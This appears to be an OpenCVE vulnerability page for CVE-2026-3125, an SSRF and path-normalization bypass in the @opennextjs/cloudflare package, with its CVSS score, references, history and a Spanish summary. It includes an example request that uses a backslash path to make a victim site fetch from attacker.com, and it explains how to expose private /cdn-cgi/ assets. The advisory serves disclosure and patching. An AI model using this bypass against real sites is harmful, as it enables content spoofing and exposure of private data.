CVE-2026-3125

  1. OpenCVE
  2. Vulnerabilities (CVE)
  3. CVE-2026-3125
A Server-Side Request Forgery (SSRF) vulnerability was identified in the @opennextjs/cloudflare package, resulting from a path normalization bypass in the /cdn-cgi/image/ handler.The @opennextjs/cloudflare worker template includes a /cdn-cgi/image/ handler intended for development use only. In production, Cloudflare's edge intercepts /cdn-cgi/image/ requests before they reach the Worker. However, by substituting a backslash for a forward slash (/cdn-cgi\image/ instead of /cdn-cgi/image/), an attacker can bypass edge interception and have the request reach the Worker directly. The JavaScript URL class then normalizes the backslash to a forward slash, causing the request to match the handler and trigger an unvalidated fetch of arbitrary remote URLs. For example: https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com In this example, attacker-controlled content from attacker.com is served through the victim site's domain (victim-site.com), violating the same-origin policy and potentially misleading users or other services. Note: This bypass only works via HTTP clients that preserve backslashes in paths (e.g., curl --path-as-is). Browsers normalize backslashes to forward slashes before sending requests. Additionally, Cloudflare Workers with Assets and Cloudflare Pages suffer from a similar vulnerability. Assets stored under /cdn-cgi/ paths are not publicly accessible under normal conditions. However, using the same backslash bypass (/cdn-cgi\... instead of /cdn-cgi/...), these assets become publicly accessible. This could be used to retrieve private data. For example, Open Next projects store incremental cache data under /cdn-cgi/_next_cache, which could be exposed via this bypass.

6.5 /10

CVSS v3 : MEDIUM

V3 Legend

Vector :

Exploitability : 3.9 / Impact : 2.5

Attack Vector NETWORK

Attack Complexity LOW

Privileges Required NONE

User Interaction NONE

Confidentiality Impact LOW

Integrity Impact LOW

Availability Impact NONE

Scope UNCHANGED

References
Link Resource
https://github.com/advisories/GHSA-rvpw-p7vw-wj3m Third Party Advisory
https://github.com/opennextjs/opennextjs-cloudflare/pull/1147 Issue Tracking Patch
https://www.cve.org/cverecord?id=CVE-2025-6087 Third Party Advisory
https://www.npmjs.com/package/@opennextjs/cloudflare/v/1.17.1 Product Release Notes
Configurations

Configuration 1 (hide)

cpe:2.3:a:opennextjs:opennext_for_cloudflare:*:*:*:*:*:node.js:*:*
History

09 Mar 2026, 17:51

Type Values Removed Values Added
First Time Opennextjs
Opennextjs opennext For Cloudflare
CVSS v2 : unknown
v3 : unknown 		v2 : unknown
v3 : 6.5
CPE cpe:2.3:a:opennextjs:opennext_for_cloudflare:*:*:*:*:*:node.js:*:*
Summary
  • (es) Una vulnerabilidad de falsificación de petición del lado del servidor (SSRF) fue identificada en el paquete @opennextjs/cloudflare, resultante de un bypass de normalización de ruta en el gestor /cdn-cgi/image/. La plantilla de worker @opennextjs/cloudflare incluye un gestor /cdn-cgi/image/ destinado solo para uso en desarrollo. En producción, el edge de Cloudflare intercepta las peticiones /cdn-cgi/image/ antes de que lleguen al Worker. Sin embargo, al sustituir una barra invertida por una barra inclinada (/cdn-cgi\image/ en lugar de /cdn-cgi/image/), un atacante puede eludir la intercepción del edge y hacer que la petición llegue directamente al Worker. La clase URL de JavaScript luego normaliza la barra invertida a una barra inclinada, haciendo que la petición coincida con el gestor y desencadene una obtención no validada de URLs remotas arbitrarias. Por ejemplo: https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com En este ejemplo, contenido controlado por el atacante de attacker.com se sirve a través del dominio del sitio víctima (victim-site.com), violando la política de mismo origen y potencialmente engañando a usuarios u otros servicios. Nota: Este bypass solo funciona a través de clientes HTTP que preservan las barras invertidas en las rutas (p. ej., curl --path-as-is). Los navegadores normalizan las barras invertidas a barras inclinadas antes de enviar las peticiones. Además, Cloudflare Workers con Assets y Cloudflare Pages sufren de una vulnerabilidad similar. Los Assets almacenados bajo rutas /cdn-cgi/ no son accesibles públicamente bajo condiciones normales. Sin embargo, utilizando el mismo bypass de barra invertida (/cdn-cgi\... en lugar de /cdn-cgi/...), estos assets se vuelven accesibles públicamente. Esto podría usarse para recuperar datos privados. Por ejemplo, los proyectos Open Next almacenan datos de caché incremental bajo /cdn-cgi/_next_cache, que podrían ser expuestos a través de este bypass.
References () https://github.com/advisories/GHSA-rvpw-p7vw-wj3m - () https://github.com/advisories/GHSA-rvpw-p7vw-wj3m - Third Party Advisory
References () https://github.com/opennextjs/opennextjs-cloudflare/pull/1147 - () https://github.com/opennextjs/opennextjs-cloudflare/pull/1147 - Issue Tracking, Patch
References () https://www.cve.org/cverecord?id=CVE-2025-6087 - () https://www.cve.org/cverecord?id=CVE-2025-6087 - Third Party Advisory
References () https://www.npmjs.com/package/@opennextjs/cloudflare/v/1.17.1 - () https://www.npmjs.com/package/@opennextjs/cloudflare/v/1.17.1 - Product, Release Notes

04 Mar 2026, 19:16

Type Values Removed Values Added
New CVE
Information

Published : 2026-03-04 19:16

Updated : 2026-03-09 17:51

NVD link : CVE-2026-3125

Mitre link : CVE-2026-3125

CVE.ORG link : CVE-2026-3125

JSON object : View

Products Affected

opennextjs

  • opennext_for_cloudflare
CWE
CWE-706

Use of Incorrectly-Resolved Name or Reference

CWE-918

Server-Side Request Forgery (SSRF)